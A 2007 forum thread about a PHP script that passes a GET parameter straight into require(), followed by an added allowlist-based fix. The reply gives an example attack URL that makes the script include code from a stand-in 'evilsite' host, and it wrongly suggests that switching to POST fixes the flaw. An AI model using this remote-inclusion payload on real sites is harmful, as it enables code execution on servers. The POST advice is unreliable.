Re: PHP script help

Posted by Areric on 01/15/07 18:24

My guess is that all a scammer would need to do would be to pass a
script in the URL that would point to something malicious on another
server.

So for example say your site is mysite.com and the name of this script
is mailscript.php

I could navigate to your site as

http://www.mysite.com/mailscript.php?sport=www.evilsite.com/evilscript

Your script would then take that whole string
"www.evilsite.com/evilscript", append .php and include it. (The .s and /
would need to be converted to % notation first, but same idea.)

Fixing it would require you to submit the variable in POST, although I'm
not too sure if that's 100%.


SA SA wrote:
> Hello,
> I do not know anything about PHP but was thrown into this mix. I was told
> by my ISP that there is a vulnerability in the following code that allows
> a spammer to load an offsite PHP script for mailing. The defective code is:
>
>
> if (isset($HTTP_GET_VARS['sport']))
> {
> $sport = $HTTP_GET_VARS['sport'];
> require ($sport.".php");
> }
>
>
> How do I fix it?
>
> If I am in the wrong group please forgive me.
>
> thanks
> sa
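
An added example, not part of the original thread: one way to close the hole in the quoted code is to use the request value only as a key into a fixed allowlist, so it never becomes part of the path handed to `require`. The page names, the `pages/` directory and the function name `resolveSportPage` are assumptions for illustration; the code needs PHP 7.1 or later.

```php
<?php
// Added example (not the original poster's code).
// Assumption: the site has three sport pages stored under ./pages/.
const SPORT_PAGES = [
    'football' => 'football.php',
    'tennis'   => 'tennis.php',
    'cricket'  => 'cricket.php',
];

/**
 * Map an untrusted request value to a file that is safe to include.
 * Returns the absolute path, or null if the value is not allowed.
 */
function resolveSportPage($requested, string $baseDir): ?string
{
    // Reject arrays (?sport[]=x) and other non-string input.
    if (!is_string($requested)) {
        return null;
    }
    // Exact-match lookup: URLs, "../" sequences and NUL bytes simply
    // fail to match a key, so they never reach the filesystem.
    if (!array_key_exists($requested, SPORT_PAGES)) {
        return null;
    }
    // Defence in depth: the resolved file must exist inside $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . SPORT_PAGES[$requested]);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// The same check applies whether the value arrives by GET or POST.
$page = resolveSportPage($_GET['sport'] ?? null, __DIR__ . '/pages');
if ($page === null) {
    http_response_code(404);
    exit('Unknown page');
}
require $page;
```

Setting `allow_url_include = Off` in php.ini additionally stops `require` from fetching remote URLs, but the allowlist is still needed to prevent inclusion of unintended local files.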

 
